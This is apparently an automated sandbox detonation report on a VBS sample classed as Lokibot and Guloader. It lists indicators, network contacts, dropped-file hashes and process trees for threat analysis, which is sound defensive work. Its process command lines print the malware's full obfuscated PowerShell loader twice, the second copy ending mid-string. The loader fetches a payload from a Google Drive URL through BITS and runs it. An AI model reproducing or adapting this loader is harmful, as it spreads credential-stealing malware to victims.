Analysis Overview
SHA256
43517d5122fb62dbfcd0e8ab99010ece43d41ed58dc024868f77bc05a0a81612
Threat Level: Known bad
The file 43517d5122fb62dbfcd0e8ab99010ece43d41ed58dc024868f77bc05a0a81612.vbs was found to be: Known bad.
Malicious Activity Summary
Lokibot
Guloader,Cloudeye
Blocklisted process makes network request
Checks computer location settings
Accesses Microsoft Outlook profiles
Legitimate hosting services abused for malware hosting/C2
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Enumerates physical storage devices
Program crash
Suspicious use of AdjustPrivilegeToken
outlook_win_path
Suspicious behavior: EnumeratesProcesses
outlook_office_path
Suspicious use of WriteProcessMemory
Suspicious behavior: MapViewOfSection
Analysis: static1
Detonation Overview
Reported
2024-03-29 02:11
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-29 02:11
Reported
2024-03-29 02:14
Platform
win7-20240221-en
Max time kernel
156s
Max time network
152s
Command Line
Signatures
Guloader,Cloudeye
Lokibot
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1756 set thread context of 2488 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\43517d5122fb62dbfcd0e8ab99010ece43d41ed58dc024868f77bc05a0a81612.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Mishitting unwrinkleable Energiindholds Funktionskommandoen Fidusmageriers Refreshfejl #>;$Duefalks=(cmd /c set /A 115^^0);Function Genanvendelsesprocessens ([String]$recriminatory){$Duefalks=[char][int]$Duefalks;$Rygsttte=$Duefalks+'ubstring';$Diskomusikken45=8;$Hamunds=Spiderweb($recriminatory);For($Duplikeringscentral=7; $Duplikeringscentral -lt $Hamunds; $Duplikeringscentral+=$Diskomusikken45){$Seapost=$recriminatory.$Rygsttte.Invoke($Duplikeringscentral, 1);$Orddelingsmulighed=$Orddelingsmulighed+$Seapost;}$Orddelingsmulighed;}function Alfridaric ($Lorenas){& ($Forsmdeligheder) ($Lorenas);}function Spiderweb ([String]$Misc50){$Bagstavnens=$Misc50.Length-1;$Bagstavnens;}$Byretternes248=Genanvendelsesprocessens 'DrawgloTL kfabrr Over.iaMilliarnbirderssAnalogifS.ydskaeFlourisrpibekonrCosiermiCan.idanFrist.rg Ba.jer ';$Skeetskydning=Genanvendelsesprocessens 'A.rdromhTrogonotVa,uumatFangstkpLucidnesDemo og:Korrela/Cathrin/LuftfardPosturarskolebeiMagistrvh.arnaaeAfbe,ed.OndartegDaadlsao Ken inocoendurgTryllekl Duplice Mewlin.Ressortc EquivaoCalefacmTransi,/ LittleuMonozy cR,brish?BeroendecisternxAthelinpOversimoRott.nsrMilie.atViolone=GennemsdTubulidoToxodonwAl.opatnLivsforlIndhaleogradv sa CossnedErnring&UncausaiSolbadsdFranssm= Equiba1G,urmanaChurri,GDolkest3 FormidYBartholp S.alke1UrskoveFFerreir1UnseverBac,pensrStern.drDysonstxei.olag6hermene3 Reprsev Snedk,yCransie_NullipedCute.sp9 AfplukHSmaalotVFourteeRRecontrF MorgenpStonema9Formueg6ForudrejVa.utap6TytonidY FyrresyMrkatenO BlystboKo.omip ';$Forsmdeligheder=Genanvendelsesprocessens ' kao.iniK artaleAvlsk,exsquilge ';$Nontarnishing=Genanvendelsesprocessens 'Scenit.$ForfaldgTeheetrlBulbideoSkrdd rb FeltbeaAsthma.l Bogtil: S stemFL.ckfuliPissescrS veflysImportutMiskredeTartarlm NeodadmbnkhammiPriseligBareboaeTrvetris ananas Cosignv=Negrita AmintorS DiaboltSoullikaMahmoudrGyldenbt 
Cottag-PetitjoBUdmatniiCohenimtSystemesFam,liaTNulpunkrAntist.aBedmmernCurs rfsStr tegf BrontoeKastorlr .ongae Isacsmo-Kewi omSPupalmyoUncongru guignor,arlatac ComplaeUdkigsm Preclea$MastigoS,urrogakRich,rteblankeeeBaalfrdthist,gesSkruehokb aceroyGrublesdS.ltananSmithieiTirana,nDemi.olgAl erne Jor.vrd-WordmonDStruktueEnpia os ngliktAvn.nbeiUku.lignHamburgaIlialattMind.kei U condo lassisnSponsib .urmoil$BrndeknPGedeostoShanghadKa,tisma Bacillr Trillug.inroweiMozingmdKrameria BenzoxeResolub ';Alfridaric (Genanvendelsesprocessens 'Vuggest$ hjl.elgAlman el .odetiopressesbFit,roya velprolKi.djal:Ter,binPEv,lueroSyltegldCessnanaqui decrstrengtgS nsoreiUncrushd Bygde,aBesveg.eRimbase= Butter$SuppuraeOscillanHensigtvL.rekla: Lynassa DorylipStarttipAutistid DirectaFaa.andtAgainwaaP,octos ') ;Alfridaric (Genanvendelsesprocessens 'urbinatITopissimFdeklinp guanodo Hee.esr Un.xpetCarbone- Pr.mavMAfstignoSidsenudPraelecubotundelSubnutre Organo ChestcoBAeroplai ReparttIsolatisKassablTBlomsterSvabretaSekretsnKortskasAlg,genf SamordeE tusiarMomzerp ') ;$Podargidae=$Podargidae+'\Frosts.sig' ;Alfridaric (Genanvendelsesprocessens 'Sn,rkle$Contrafg anlgsglFo udskoRremas.bKontradaStrouthlTethyst: I orgaLPe agogoDive,gewOverma.e Civilrr Cryb bibrugeranPerspekgLesedpr= Eupadm(Frotte.TThymeeve.ntipsys AccosttFrdigef- und.rcPBioetikabryst utrrfabrihOpsnuse Prevail$UnapparPEnzymetoAuningsdindstila He.oalrMonacidgPalatali.posercdBrugtesaRemed,teExisti.)Micropr ') ;while (-not $Lowering) {Alfridaric (Genanvendelsesprocessens ',lliticIBiogr.ffOmk,stn Intra,(expande$Be,trowFTroubleirystelsrBeskyttsMocmaintVrimlete atriarmHoodw.nm UsneamiFo lngegSolisteeCrispatsOrigina. 
ryptogJ pol vio.eavelybItho iiS InsolethornhinaBromofotSp kedaeAmaryll Phoenic-Sv vlile YnglinqKondens Turnech$Trendi B pastedySilverer Di inye .ctopotCo,sumetAfspil,e ,drmmerAnisaldnHayb teeStenedesGanoma,2 Apotra4sensefu8Blommes) Rackma Knaste.{GambierSA tsfortBredsaaaHype inrQuadrattPaaskel-ProrateSTakkefelBilulykeProstomeDingoerp ,iggar Unvanta1Psychop}HeroicaeKollapslDeairsssBindemieLarynxe{LnkontoSLommetotPausemeaIndkomsr ignomitnoncomp-,insnarS Ha.vhjlKosysteeDimensiean syrep ,apote Stymper1Undocto;SnakeflACalycinlLogp.rcfTraadner SvageliT gneendTetrapoaF,nansirExp undi NonanicRikoc e Sarasd$EjendomNRbretnio Y.rwhinMerthiotStrgbutaTheophirOozierbnBorog vi,arasitsUvi,kaahWhitis,iforsik.nPlanarigBasella}Yndetel ');Alfridaric (Genanvendelsesprocessens ' Fremsk$SolennegOver,eel PolliwoKo.legibHushcloaSaettemlSponsor:CatheteLHistorioIntercrwPolygone Ostr.crFornje iUlcusdenMegawatgCurforb=Buttonc(Whit.biTtavleskeKommercsPremud.t Titrer-PalladiP AerligaOrdnerntChoristh Regra, A renes$S,ovlplP Wa.erpo Afsk edBund maa BlrervrHjerneagphratriiU snobbdAmmoni,aDolklipeBetving)Sweenys ') ;}Alfridaric (Genanvendelsesprocessens 'I,filtr$CuniculgE.termilUnimbanodosmerebNoncohaaVaude.ilSo,dayf:KoldsveT Gastr.uactino nAerobiogicccadvh HypoamrEsse.eniUd.amrig,vibelghTrioboleDromedadsi natueFinge.sn phos hsDeconta Kodesk=P,ntill RetrostGP rametephosphat Fideju-MngdebeCStenfisoTilsid.nH.gemontAppetiseselvrosnKonebyttAppetiz autarki$Cor,deePLi.refooLaborerd BiltraaGaapa mrRgerierg A.skali.atalied Avn.gea vocatiePhanto ');Alfridaric (Genanvendelsesprocessens 'Istanbu$ Mos uig.uodesflMedullioTinw,reb,rneblaaTanzan l mortif:,ydisolGTyrann,uVict,aldNo dames LandskjUngree aSnavsvam ReproamAllianceS,rngemr vestial Omegnsi L.isteg Inddrie Jum surCognacsePondero Opionsm=Maaneds H,stopa[ Dul,imSSunfishy AttraasMawbountOuttea,eMortensm Suprav.OverhumCHyenineoMilieubn b nelevK,dnappeamphigar AntikltSkotren] Recapi:Oratric:SnoolsuFStyledrrha dlefocla.ichmM.srealBsternebaBleganss Rekvise 
Cornma6Pu,ridh4ThumbedSSpidsent S.irebr KunstaiRhizocanT.nfoldgOutwinb(Co.simi$ sportsTLabdanuuUnregennSo ostegTr.kkenhSvans arCensureiHeimorcgPre edehUnone,oeBoreensdUnsalareopsigernSidestisUnamend) enants ');Alfridaric (Genanvendelsesprocessens 'vineyar$MeatoscgDisorielMacrospoCr.wbarb Strafba.avortelRoe,ree:systemaSOverskrtde,alityBluebusrEx enseeOrielhvk ordkrioKolonisrFlayflitBurrknoeDividenn Lselame M.ning Stvkon=Superga Parabol[CommonaS VaabenyGe,aniesJablonstLnkontoe.sskabem Colpor.Discli.TAllitteeAnstdelx Boile.t Enz me.Reg,ormECiselernBryststcComp,omo Parasid.lagetsiTaxa.lyn Depl,mgCyphell]Indlgsb:trophyw:ParasolASaetninSWolfsprCData,orIPredefeIAtionsv.AnatropGSunkl.neCayleystFerraraS.pildnetFusi.lyrEjendetiweedlesn Nons,mgRaderer( Housew$ Nonam,GBeva,rou ffhandd.elsstrsVladbj,jMakvr,saS.lkwormForga.gmSprensaeVerju crJoaninalTillrt iUnca ceg PappoueHypercorGeropigeSpritkr).aplont ');Alfridaric (Genanvendelsesprocessens 'Frysesk$LaudanugReburyilPresecuoPana hebScarolaaCif erllJaevnli:Syn.ectMLokumscaOversetrefterslgFokuseriUdvi.linDuennasaNavigatlPad acyiRevengesBoulezkeTilbagerCurvateePr dukttBenzoph=Lituusc$Unho.tiS RestautRegnskayAff.ktirEfterkoeNucleopkRekviemo ro gerrFl.ggintSplejsveOpfriskn SkppedeCimolit. Liges,sVi ediruKlampenb RibonusDuodynatDamb ugr Fond bigennembnBre baagBnne.ta(Grun va3Ffeun i0haandka8Diapaus1Ny urde9De iner7 tilfil,Leucoto3Lopside1Udgan.s9M rgrie2Spklage9smaagri)Matr.li ');Alfridaric $Marginaliseret;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c set /A 115^^0
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c set /A 115^^0
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 142.250.187.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 172.217.16.225:443 | drive.usercontent.google.com | tcp |
| GB | 142.250.187.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 172.217.16.225:443 | drive.usercontent.google.com | tcp |
| US | 140.82.61.49:80 | 140.82.61.49 | tcp |
| US | 140.82.61.49:80 | 140.82.61.49 | tcp |
| US | 140.82.61.49:80 | 140.82.61.49 | tcp |
| US | 140.82.61.49:80 | 140.82.61.49 | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Preeducated.txt
| MD5 | c182cc2051a1f2cb0f78364db81b9fc1 |
| SHA1 | afef4d6a4f66aa307df4ed1179256d4667444585 |
| SHA256 | 5e29ffa5f6109f87e5d4205a591bbc8fcb529e3643462f6487b5479eb46d79be |
| SHA512 | 40b2d28acdfa3eda9997c385a67e86c0a120e1a12cc3c51ff2d649c262f458089be88c63ac042b43fed19386e6664bba6a632db67357f71f53c4719f30b37eac |
C:\Users\Admin\AppData\Local\Temp\Preeducated.txt
| MD5 | 8554355ff9009da1b1c8536a9bb2e2fd |
| SHA1 | 539aef5de341d53a43fa26a2d5e6ddd7f82a508d |
| SHA256 | aa4e604ec667d549b72c32b33e76269b0cdabc5c747b67889e7bfad238760d39 |
| SHA512 | 256472a8fa9f1381fedf8ed14858786f63ed4fa176eb5940abf5d90dc2547356458a9cbf5ec39de949e7a79c698fe91c708ebd8114d759d310c9f308e44bdb94 |
C:\Users\Admin\AppData\Local\Temp\Preeducated.txt
| MD5 | e55e9d1ae5fe8f525a35539ef7cb8a26 |
| SHA1 | eae2cc90fe2fff8c8391a4ba827aa06064c729bc |
| SHA256 | 4a45982b8c4124238f30262f24e37fd9dd3461728376854a3b7efb0fadc7c585 |
| SHA512 | bfebd15265f78a76f237c2bd695b813f0580cece1a53ca61291011c1edfa8845e2e436ea609b3cfb4be94001106ec8373438dc8483656ba33209db29c815cf89 |
C:\Users\Admin\AppData\Local\Temp\Preeducated.txt
| MD5 | 41077e923293898955e78267b7878339 |
| SHA1 | 36083128a00b83103bfe8bc36b0042ff6a703012 |
| SHA256 | 4d9b1845d8c7b9f85c23bf670d2df4757bfdd59ac5ccebee2df7cbb3b26292f0 |
| SHA512 | 070c9f8fc7fb22dda57f57c950250b4476f4790c91b0e26616db50a053a4b385b302f30d19a82475252e21942532925d64e9216938f37d751af2e2af31f7c922 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EM8DQYYW9H7S7EBS6TKR.temp
| MD5 | 1af72430a9d0a1b2bbd984d5e23e81aa |
| SHA1 | bf5d0480b4dc3bb98d8b439fe71af29058f4baf8 |
| SHA256 | 35df3e1bc498ec96e4c32c1185b5fa898b27336db00fe71d26f118cff3ed0ce3 |
| SHA512 | 65904ba5927e73ee66ba5545ef3d74605e343838883a89402f594246ecb1ccc2e38cab39279eacf0751b440d5b4ae6779cb0e9ff25db959d12eae571f1fe3e06 |
C:\Users\Admin\AppData\Local\Temp\CabBDD3.tmp
| MD5 | 29f65ba8e88c063813cc50a4ea544e93 |
| SHA1 | 05a7040d5c127e68c25d81cc51271ffb8bef3568 |
| SHA256 | 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184 |
| SHA512 | e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 0250596cd7064b5a57b4367a7ca7af90 |
| SHA1 | 5e8c88112e62648215b76323353ceedeb0261ce6 |
| SHA256 | ef0b6ea2ee2c0cc0a4d9335e5c07599f8aa12adf6473a6a768937463652fcea3 |
| SHA512 | d3c1afad19c1a08d15628bd762bbec9e9c2c32a6c7fac3247f6052314199194616234eee928740e233bfb78a8c0a41bdea34987525216690d44f6062a5e42763 |
C:\Users\Admin\AppData\Local\Temp\Tar7B49.tmp
| MD5 | 435a9ac180383f9fa094131b173a2f7b |
| SHA1 | 76944ea657a9db94f9a4bef38f88c46ed4166983 |
| SHA256 | 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34 |
| SHA512 | 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | e9a2db3c218cd02fbd23c3ffdd7f9e02 |
| SHA1 | 8abc9172b0d4631ab0ab99988b25be4529e03644 |
| SHA256 | ec015b733fe5f63d3d928e1cd6148e257aa9ee047104c1d4804a82a0471ac76d |
| SHA512 | 5a59c89daeab23978422138d6b640c6d67ffc6b15078cd4ceeb8d1ba42445ab7a7a1ffcdc93ffdf202dfd45b470359d3d3d1dd73854bbdcdb9a95da520eea1a6 |
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-406356229-2805545415-1236085040-1000\0f5007522459c86e95ffcc62f32308f1_4c23b8b8-1f37-4b25-86d9-da21829a4de6
| MD5 | d898504a722bff1524134c6ab6a5eaa5 |
| SHA1 | e0fdc90c2ca2a0219c99d2758e68c18875a3e11e |
| SHA256 | 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9 |
| SHA512 | 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61 |
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-406356229-2805545415-1236085040-1000\0f5007522459c86e95ffcc62f32308f1_4c23b8b8-1f37-4b25-86d9-da21829a4de6
| MD5 | c07225d4e7d01d31042965f048728a0a |
| SHA1 | 69d70b340fd9f44c89adb9a2278df84faa9906b7 |
| SHA256 | 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a |
| SHA512 | 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b |
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-29 02:11
Reported
2024-03-29 02:14
Platform
win10v2004-20231215-en
Max time kernel
147s
Max time network
150s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\43517d5122fb62dbfcd0e8ab99010ece43d41ed58dc024868f77bc05a0a81612.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c set /A 115^^0
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Mishitting unwrinkleable Energiindholds Funktionskommandoen Fidusmageriers Refreshfejl #>;$Duefalks=(cmd /c set /A 115^^0);Function Genanvendelsesprocessens ([String]$recriminatory){$Duefalks=[char][int]$Duefalks;$Rygsttte=$Duefalks+'ubstring';$Diskomusikken45=8;$Hamunds=Spiderweb($recriminatory);For($Duplikeringscentral=7; $Duplikeringscentral -lt $Hamunds; $Duplikeringscentral+=$Diskomusikken45){$Seapost=$recriminatory.$Rygsttte.Invoke($Duplikeringscentral, 1);$Orddelingsmulighed=$Orddelingsmulighed+$Seapost;}$Orddelingsmulighed;}function Alfridaric ($Lorenas){& ($Forsmdeligheder) ($Lorenas);}function Spiderweb ([String]$Misc50){$Bagstavnens=$Misc50.Length-1;$Bagstavnens;}$Byretternes248=Genanvendelsesprocessens 'DrawgloTL kfabrr Over.iaMilliarnbirderssAnalogifS.ydskaeFlourisrpibekonrCosiermiCan.idanFrist.rg Ba.jer ';$Skeetskydning=Genanvendelsesprocessens 'A.rdromhTrogonotVa,uumatFangstkpLucidnesDemo og:Korrela/Cathrin/LuftfardPosturarskolebeiMagistrvh.arnaaeAfbe,ed.OndartegDaadlsao Ken inocoendurgTryllekl Duplice Mewlin.Ressortc EquivaoCalefacmTransi,/ LittleuMonozy cR,brish?BeroendecisternxAthelinpOversimoRott.nsrMilie.atViolone=GennemsdTubulidoToxodonwAl.opatnLivsforlIndhaleogradv sa CossnedErnring&UncausaiSolbadsdFranssm= Equiba1G,urmanaChurri,GDolkest3 FormidYBartholp S.alke1UrskoveFFerreir1UnseverBac,pensrStern.drDysonstxei.olag6hermene3 Reprsev Snedk,yCransie_NullipedCute.sp9 AfplukHSmaalotVFourteeRRecontrF MorgenpStonema9Formueg6ForudrejVa.utap6TytonidY FyrresyMrkatenO BlystboKo.omip ';$Forsmdeligheder=Genanvendelsesprocessens ' kao.iniK artaleAvlsk,exsquilge ';$Nontarnishing=Genanvendelsesprocessens 'Scenit.$ForfaldgTeheetrlBulbideoSkrdd rb FeltbeaAsthma.l Bogtil: S stemFL.ckfuliPissescrS veflysImportutMiskredeTartarlm NeodadmbnkhammiPriseligBareboaeTrvetris ananas Cosignv=Negrita AmintorS DiaboltSoullikaMahmoudrGyldenbt 
Cottag-PetitjoBUdmatniiCohenimtSystemesFam,liaTNulpunkrAntist.aBedmmernCurs rfsStr tegf BrontoeKastorlr .ongae Isacsmo-Kewi omSPupalmyoUncongru guignor,arlatac ComplaeUdkigsm Preclea$MastigoS,urrogakRich,rteblankeeeBaalfrdthist,gesSkruehokb aceroyGrublesdS.ltananSmithieiTirana,nDemi.olgAl erne Jor.vrd-WordmonDStruktueEnpia os ngliktAvn.nbeiUku.lignHamburgaIlialattMind.kei U condo lassisnSponsib .urmoil$BrndeknPGedeostoShanghadKa,tisma Bacillr Trillug.inroweiMozingmdKrameria BenzoxeResolub ';Alfridaric (Genanvendelsesprocessens 'Vuggest$ hjl.elgAlman el .odetiopressesbFit,roya velprolKi.djal:Ter,binPEv,lueroSyltegldCessnanaqui decrstrengtgS nsoreiUncrushd Bygde,aBesveg.eRimbase= Butter$SuppuraeOscillanHensigtvL.rekla: Lynassa DorylipStarttipAutistid DirectaFaa.andtAgainwaaP,octos ') ;Alfridaric (Genanvendelsesprocessens 'urbinatITopissimFdeklinp guanodo Hee.esr Un.xpetCarbone- Pr.mavMAfstignoSidsenudPraelecubotundelSubnutre Organo ChestcoBAeroplai ReparttIsolatisKassablTBlomsterSvabretaSekretsnKortskasAlg,genf SamordeE tusiarMomzerp ') ;$Podargidae=$Podargidae+'\Frosts.sig' ;Alfridaric (Genanvendelsesprocessens 'Sn,rkle$Contrafg anlgsglFo udskoRremas.bKontradaStrouthlTethyst: I orgaLPe agogoDive,gewOverma.e Civilrr Cryb bibrugeranPerspekgLesedpr= Eupadm(Frotte.TThymeeve.ntipsys AccosttFrdigef- und.rcPBioetikabryst utrrfabrihOpsnuse Prevail$UnapparPEnzymetoAuningsdindstila He.oalrMonacidgPalatali.posercdBrugtesaRemed,teExisti.)Micropr ') ;while (-not $Lowering) {Alfridaric (Genanvendelsesprocessens ',lliticIBiogr.ffOmk,stn Intra,(expande$Be,trowFTroubleirystelsrBeskyttsMocmaintVrimlete atriarmHoodw.nm UsneamiFo lngegSolisteeCrispatsOrigina. 
ryptogJ pol vio.eavelybItho iiS InsolethornhinaBromofotSp kedaeAmaryll Phoenic-Sv vlile YnglinqKondens Turnech$Trendi B pastedySilverer Di inye .ctopotCo,sumetAfspil,e ,drmmerAnisaldnHayb teeStenedesGanoma,2 Apotra4sensefu8Blommes) Rackma Knaste.{GambierSA tsfortBredsaaaHype inrQuadrattPaaskel-ProrateSTakkefelBilulykeProstomeDingoerp ,iggar Unvanta1Psychop}HeroicaeKollapslDeairsssBindemieLarynxe{LnkontoSLommetotPausemeaIndkomsr ignomitnoncomp-,insnarS Ha.vhjlKosysteeDimensiean syrep ,apote Stymper1Undocto;SnakeflACalycinlLogp.rcfTraadner SvageliT gneendTetrapoaF,nansirExp undi NonanicRikoc e Sarasd$EjendomNRbretnio Y.rwhinMerthiotStrgbutaTheophirOozierbnBorog vi,arasitsUvi,kaahWhitis,iforsik.nPlanarigBasella}Yndetel ');Alfridaric (Genanvendelsesprocessens ' Fremsk$SolennegOver,eel PolliwoKo.legibHushcloaSaettemlSponsor:CatheteLHistorioIntercrwPolygone Ostr.crFornje iUlcusdenMegawatgCurforb=Buttonc(Whit.biTtavleskeKommercsPremud.t Titrer-PalladiP AerligaOrdnerntChoristh Regra, A renes$S,ovlplP Wa.erpo Afsk edBund maa BlrervrHjerneagphratriiU snobbdAmmoni,aDolklipeBetving)Sweenys ') ;}Alfridaric (Genanvendelsesprocessens 'I,filtr$CuniculgE.termilUnimbanodosmerebNoncohaaVaude.ilSo,dayf:KoldsveT Gastr.uactino nAerobiogicccadvh HypoamrEsse.eniUd.amrig,vibelghTrioboleDromedadsi natueFinge.sn phos hsDeconta Kodesk=P,ntill RetrostGP rametephosphat Fideju-MngdebeCStenfisoTilsid.nH.gemontAppetiseselvrosnKonebyttAppetiz autarki$Cor,deePLi.refooLaborerd BiltraaGaapa mrRgerierg A.skali.atalied Avn.gea vocatiePhanto ');Alfridaric (Genanvendelsesprocessens 'Istanbu$ Mos uig.uodesflMedullioTinw,reb,rneblaaTanzan l mortif:,ydisolGTyrann,uVict,aldNo dames LandskjUngree aSnavsvam ReproamAllianceS,rngemr vestial Omegnsi L.isteg Inddrie Jum surCognacsePondero Opionsm=Maaneds H,stopa[ Dul,imSSunfishy AttraasMawbountOuttea,eMortensm Suprav.OverhumCHyenineoMilieubn b nelevK,dnappeamphigar AntikltSkotren] Recapi:Oratric:SnoolsuFStyledrrha dlefocla.ichmM.srealBsternebaBleganss Rekvise 
